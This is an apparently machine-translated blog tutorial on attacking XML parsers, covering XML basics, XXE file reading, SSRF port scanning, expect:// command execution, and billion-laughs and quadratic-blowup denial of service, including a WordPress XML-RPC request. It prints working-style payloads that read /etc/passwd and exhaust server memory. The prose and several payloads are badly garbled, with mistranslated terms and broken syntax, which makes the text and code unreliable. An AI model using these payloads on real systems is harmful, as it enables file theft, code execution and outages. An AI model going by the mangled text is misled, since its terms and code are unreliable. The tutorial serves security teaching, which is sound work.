Web application penetration testing tutorials - XML attacks

Web Application Penetration Testing Tutorials 8 XML Attacks

Web application penetration testing tutorials - XML attacks

In this Web application penetration testing tutorial, we will include some techniques to Attack XML Parser. 

XML parser There are basically programs or libraries that take XML documents as input then parsed Similar to retrieving the material in a meaningful and easy way. 

For those, who are unaware, Xtensible Markup Language (XML) is used for data exchange purposes.

XML syntax at a glance looks similar to HTML but it is used only for storage Data in a more organized way, though. By default, an XML document is just plain Text document which does not really do anything. 

To use XML we need programs Who actually read the file and make something meaningful on their basis, and therefore XML parser comes in the picture. 

XML open standard is free and supported by the World Wide Web Consortium (W3C). Let's dive deeply and go through Various sections of this chapter.


In this Web application penetration testing tutorial, some sections will have Daniel-of-service techniques (DoS), please keep in mind that DoS techniques should be tested only A controlled environment in which the application is easy to recover goes down. 

Never try to test such techniques on production systems; It may also cause you to be jailed or your job may also be minimized.

We will include the following topics in this Web application penetration testing tutorial:

  • XML 101 - The Basics
  • XXE attack - XML ​​external unit
  • XML quadratic shock

XML 101 - The Basics

Let's go through a brief tour of XML and then we will step in our sections Interest. 

XML is created due to data stored in flat data (or general data Files) is a big nuisance to handle when reading or reading. for everyone Flat file, the developer has to write his own parser who is tailor-made for him.

But this is not the case with XML, generic XML parser is used and The developer needs to write the code only to parse the document using the parser, not the Parrot is only. The XML format focuses on ease of code-readability and parsing.

The XML document looks like the following:

<?xml version="1.0" encoding="UTF-8"?>
 <name>James Jones</name>
 <roll >PACKT/1001/16</roll>
 <address>Birmingham, United Kingdom</address>

XML Elements

As you can see, there are different tags in the XML document, which are different types of data values ​​inside the start and end tags Start with the XML document An introduction, or XML declaration, defines the type of data encoding used to use, In this case, we are using UTF-8 encoding. 

Next, we have different tags that are attached Data inside them; The joint is called the element and they are designated as a copy For requirements, or clarity

for example:

  • <name> James Jones </ name> is a complete element.
  • <name> is the start-tag
  • James Jones is text or data content.
  • The </ name> tag is closed.

Note: tags are case-sensitive so the need for the end tag Similar to the initial tag, otherwise it would be a syntax error.

An XML document should contain only one element. In the preceding example XML, we can see <student> .... </ Student> is the root element.

XML Attributes

Let us consider an XML document:

<?xml version="1.0" encoding="UTF-8"?>
 <blog id="123">
 <post>Hello World</post>
 <owner>James Jones</owner>

Now, with the name </ blog> ... </ blog> in the preceding example, we can see A related feature ID that has a value of 123. An attribute has only one value Related to a particular tag. 

One thing to note here is that there should always be an attribute
Quoted with a single quote or double quotation.

XML DTD and Entities

XML DTD is a document that is used to verify XML document for some Criterion, remember that the XML document may be syntactically correct but not Follow DTD. 

So basically it acts as a defined template in which one is defined
And valid structure, properties and elements for a fixed XML document.

Internal DTD

Consider the following XML document:

 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student [
 <!ELEMENT student (name,roll,dob,address)>
 <!ELEMENT name (#PCDATA)>
 <!ELEMENT roll (#PCDATA)>
 <!ELEMENT address (#PCDATA)>å
 <name>James Jones</name>
 <roll >PACKT/1001/16</roll>
 <address>Birmingham, United Kingdom</address>

In the preceding document, a DTD is embedded with the document,
It defines how the structure of a document should be. DTD is very easy to understand and interpret this as:

  • <! DOCTYPE STUDENT: The basic element will be given the name of the student.
  • <! Element Student (name, roll, dub, address): it tells that student Elements will include four elements: name, roll, dob, and address.
  • <! ELEMENT name (#PCDATA)>: indicates that the name element belongs to PCDATA Type, which is parsed character data. This is similar to other tags like Roll, Dob Find out more

After the DTD is over, the XML document follows.

The DTD we discussed here is called internal DTD because it is embedded inside XML Document.

External DTD

Consider the following XML document:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE student SYSTEM "student.dtd">
 <name>James Jones</name>
 <address>Birmingham, United Kingdom</address>

Now, in this XML document, we can see that DTD is only a URI, and the parser will download the student.dtd file and validate the document against it. Student DTD includes:

<!ELEMENT student (name,roll,dob,address)>
<!ELEMENT address (#PCDATA)>

So, in this case, we basically split DTD into a separate file and XML document; therefore it is referred to as external DTD.


An XML entity represents some information. Is a predefined unit
Usually, markup characters represented such as <,>, and so on. In general, One unit starts with one, ends with one, and the name of the unit is in the middle of them. 

For example, to represent, we <l & lt; Use; Common in the following table Preset bodies in XML:

Character Entity Reference
& &amp;
< &lt;
> &gt;
" &quot;
' &apos;

Let's take a look at an XML unit example:

<? xml version = "1.0" encoding = "UTF-8"?>
<Less> & lt; </ Less>
</ Student>

Entity Declaration 

We can define our own institutions which will internally refer to some information. Or externally

Consider the following XML:

<? xml version = "1.0" encoding = "UTF-8"?>
<! DOCTYPE students [
<! Students (# PCDATA)>
<! ENTITY's name is "James Jones">
<Student> more names; </Student>

XML in DTD <! The name ENTITY is the name "James Jones">& Defines the name; The unit for value, James Jones. 

Unit declaration of this type Is called internal declaration because everything is defined within the same document and There is no need to bring anything externally.

Similar to the external DTD, we also have external bodies. Consider the following XML Which refers to external entities:

<? xml version = "1.0" encoding = "UTF-8"?>
<! DOCTYPE students [
<! Students (# PCDATA)>
<! ENTITY sname SYSTEM "https://www.prakharprasad.com/external.xml">
<Student> and SNAME; </ Student>

To declare the external unit to be used by us:

<! ENTITY name system "URI">

As the parser reads it in the XML document, it processes external URIs. 

URI is defined on the handler and the file is downloaded internally
An external entity reference is used, wherever the parser is replaced and replaced. 

In the preceding XML, URI is https://www.thehacktech.in/external.xml and the name is Unit name & sname ;; External Xml file will be downloaded and replaced in place of & sname; Inside <student> .. </ student> element. External institutions An important attack vector from an attacker's perspective; 

We will use external The units in the next section where we will discuss the XML External Unit (XXE) attack.

XXE Attack

XML attack is based on the concept of external institutions in XML. We can use URI part of external organizations such as reading files, doing dirty things like xfiliation Performing data, server-side request forgery, or even execute arbitrary code.

Consider the following XML parsing code in PHP:

 $xml = $_POST["xml"];
 $student = simplexml_load_string($xml,'SimpleXMLElement',LIBXML_
 <title>Name Game</title>

Your name is <?php echo $student->name; ?>


The preceding code simply displays the name supplied inside the XML document Through a post request. 

Let's display an example for workings. XML After parsing PHP by parsing, the document and the reaction together The code is as follows:
Web Application Penetration Testing Tutorials 8 XML Attacks

As you can see, the PHP parsing code just picks up for the XML document Data document's name was explained inside the tag. Now start abusing URI section of external organizations for exploitation

Reading Files

XXE allows us to read files on the system; It's really amazing because we can read it Content of various, juicy configuration files with sensitive information A database user name and password.

Before we demonstrate the ability to read files Announce an external unit and then point your URI section to some file on it Web server's disk.

Consider the following XML document which will be fed in the form of parser input:

<? xml version = "1.0" encoding = "UTF-8"?>
<! DOCTYPE students [
<! ENTITY oops SYSTEM "file: /// etc / passwd">
<Name> and Oops; </ name>
</ Student>

Response from the parser:

Web Application Penetration Testing Tutorials 8 XML Attacks

look at that! We just read the contents of the /etc/passwd file from the Linux Web server.

It was parsing the script. We have misused the file: // the file to read the handler and Display the output as an external unit. Similarly, we can also read other files Well (if permission is allowed to us)

In some environments, it is possible to get the directory list with the file: // Handler:

<! ENTITY oops SYSTEM "file: /// etc /">

This will result in a directory list for / etc.

PHP Base64 conversion URI as an alternative 

We can use PHP's Base64 conversion URI as a file option: // URI
Techniques for reading files. The URI's general format is:

php: //filter/convert.base64-encode/resource=/file/to/read

Let's repeat the same process, but this time instead of using conversion techniques. The XML payload is as follows:

<! DOCTYPE students [
<! ENTITY pwn SYSTEM "php: //filter/convert.base64-
Encode / resource = / etc / password ">
<Name> and pwn; </ name>
</ Student>

Once the parser receives the payload, it will return the /etc/passwd file contents Base64 Encoded Format:

Web Application Penetration Testing Tutorials 8 XML Attacks

We can go ahead and paste into a base 64 decoder, such as tab encoded content such as barcode decoder and can decode files back to normal:

Web Application Penetration Testing Tutorials 8 XML Attacks

Whenever the PHP environment is suspected to be affected, this technique is advised With an XXE vulnerability


SSRF server-side request is shorthand for forgery; It basically allows an attack Cheating the server running the XML parser to create a connection to the remote host It will be documented in detail in the next tutorial. 

For now, use SSRF Vulnerability to scan remote port. We will use the HTTP URL in one The outer unit, then manually replace the different port numbers. 

Here is the argument Whenever the parser tries to load the unit from the URI for every correct embryo (Open Port) This HTTP request will return a page with failure, sometimes to Display service banner; 

But for every unsuccessful attempt, it will display an error Showing a connection failure. 

The original XML payload would be this one:

<? xml version = "1.0" encoding = "UTF-8"?>
<! DOCTYPE students [
<! ENTITY Ooph System "http://scanme.nmap.org:20/">
<Name> and Oops; </ name>
</ Student>

As you can see, we have started at URL in port number 20 and will be sequentially Increase the port number until we get an open port:

<! ENTITY Ooph System "http://scanme.nmap.org:20/">
<! ENTITY Ops System "http://scanme.nmap.org:21/">
<! ENTITY Ops System "http://scanme.nmap.org-22/">
... ... ... ... ... ...
<! ENTITY Ops System "http://scanme.nmap.org:X/">

For port number 20, we get an error in which the network is said to be out of reach and it fails. Load External Unit:

Web Application Penetration Testing Tutorials 8 XML Attacks

We also get an identical error for port number 21, but if we go to port number 22, we get an HTTP failure error, which is proof of open space:

Web Application Penetration Testing Tutorials 8 XML Attacks

In fact, this time we have got a service banner, the server is running an OpenSSH service on port 22. By using this true/false reasoning, we can easily scan the ports.

Remote Code Execution

The ability to execute arbitrary code on the server is always attractive. We can use PHP Expected:// to run an arbitrary command on the URI wrapper server. Php The documentation says that we can execute the command by entering the command name
Hopefully inside://URI:

Web Application Penetration Testing Tutorials 8 XML Attacks

Consider the following XML payload, which will trigger code execution when Expected: // is enabled:

<? xml version = "1.0" encoding = "UTF-8"?>
<! DOCTYPE name [
<! ENTITY rce SYSTEM "Expected: // id">
<Name> and rce; </ name>
</ Student>

The preceding code executes the Linux ID command on the affected Web server:

Web Application Penetration Testing Tutorials 8 XML Attacks

This is for RCE. Let's now proceed to deny the service through an XXE.

Denial of Service through XXE 

We can force a server to read weaker files like XXE such as /dev/random or /dev/urandom and knock them offline. So far you will be familiar with File: // URI and we will create an XML payload that will read using /dev/random File: // URI and then drop the server down by repeating several requests:

<? xml version = "1.0" encoding = "UTF-8"?>
<! DOCTYPE students [
<! ENTITY Oh System "File: ///Dev/Random">
<Name> and Oops; </name>

The XXE payload, when attempted several times, the server slows down and eventually drops it down. You can see me in my testbed:

Web Application Penetration Testing Tutorials 8 XML Attacks

The CloudFeller error shows due to the host server being unavailable (due to the attack) Let's now go through the XML quadratic blackout technique.

XML Quadratic Blowup 

XML is a contradiction of service attack vector against the Quadratic Bloop Attack A XML parser. Before I start writing about XQB, explain the technology I told earlier Arab laughing, which does not work anymore but will give you a foundation Toward XQB

XML Billion Laughs 

XML Hansie DoS attack starts by simply declaring an XML document With an entity named Lol (hence the name laughs is associated with it but inside A common case) This can be any valid name) The unit is again nested to 10 Time (or more). 

This forces the XML parser to allocate memory for each one Unit Reference.

So a large part of memory gets wasted, by sending it XML document repeatedly; One can simply pull out a server from all the memory, eventually killed it. 

However, parsons now detect nested XML entities and Stop parsing immediately, killing this vector. 

A classic XML lien XML laughs The payload is as follows: XML billions laughing

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8

Although this vector is dead, here is the foundation of our XQB attack.

The Quadratic Blowup 

Instead of using nested recurring unit references, in quadratic bloop, Technology declares a large size unit and then refers to that unit thousands of times Inside an XML element; In some cases, the result is very similar to the laugh.

A typical XML quadratic bloop XML document looks like this:

<? xml version = "1.0"?>
<! DOCTYPE students [
<! ENTITY x "xxxxxxxxxxxxxxxxxxx ..."> (50,000-100,000)
<Student> & x; & x; & x; & x; & x; & x; & x; & x; ... </ student> (50,000-100,00)

The preceding template declares the unit length of thousands of bytes and Then puts thousands of references inside its XML element. Laughing out of it There are billions of laughs in a similar system.

WordPress 3.9 quadratic blowup vulnerability – Case Study

WordPress does not require any introduction; It's probably the most widely deployed Blogging CMS on the Internet, However, WordPress had to face version 3.9 and below With a quadratic trauma vulnerability, it was discovered by Israeli security Researcher Neer Goldsmith

XML-RPC endpoint is available in WordPress, which takes valid XML data.

XML parser then processes the XML data or document, and this is where XQB arrives In the picture. 

It takes advantage of Apache/MySQL default memory configuratio The way WordPress has interacted with them. It can be vulnerabilityCan be exploited by simply sending XML-RPC documents with the XQB unit the arrangement. The HTTP request is as follows:

POST /wordpress/xmlrpc.php HTTP / 1.1
Host: sandbox.prakharprasad.com
Connection: Keep alive
Content-Length: 220079
<? xml version = "1.0"?>
<! ENTITY x "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx .... (Modified) ">
<DoS> & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & X
; & X; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x; & x;
And X; & x; & x; & x; & x; & x; & x; & x; & x; & x; ...... (modified) </ DoS>

XML payload sent to XML-RPC Endpoint contains 1000 x of X And there are 40,000 references in the <DoS> XML element. By sending the request, again and again, The same, the server eventually gets choked and dies. RAM and CPU usage Access to their maximum, as shown in the following screenshots:

Web Application Penetration Testing Tutorials 8 XML Attacks

Similar DoS is also available for the Drupal CMS platform.


In this Web application penetration testing tutorial, we have gone through different ways in which we can exploit an XML Parser or a service that parses XML. 

XML parsers are very common these days, they can be viewed as API endpoints, XML services, or even files Upload form which processes XML files after uploading. 

Many of them are wrong, Thus, on the flaws like XXE and on the surface. Practice XXE and XML For a better understanding, DoS tech was XXE in a controlled environment Facebook is used to obtain remote code execution: http://www.ubercomp.com/
Posts / 2014-01-16_facebook_remote_code_execution

In the next Web application penetration testing tutorial, we will cover some emerging attack vectors such as PHP objects Injection, RPO, and many more.


Hi'i'm Rahim Ansari ,from India, I Love to Blogging, Desing Website, Web Developing and Desiging I Like to Learn and share Technical Hacking/Security tips with you,I Love my Friends.

Please Ask Question on Comment Box

Related Posts

Next Post »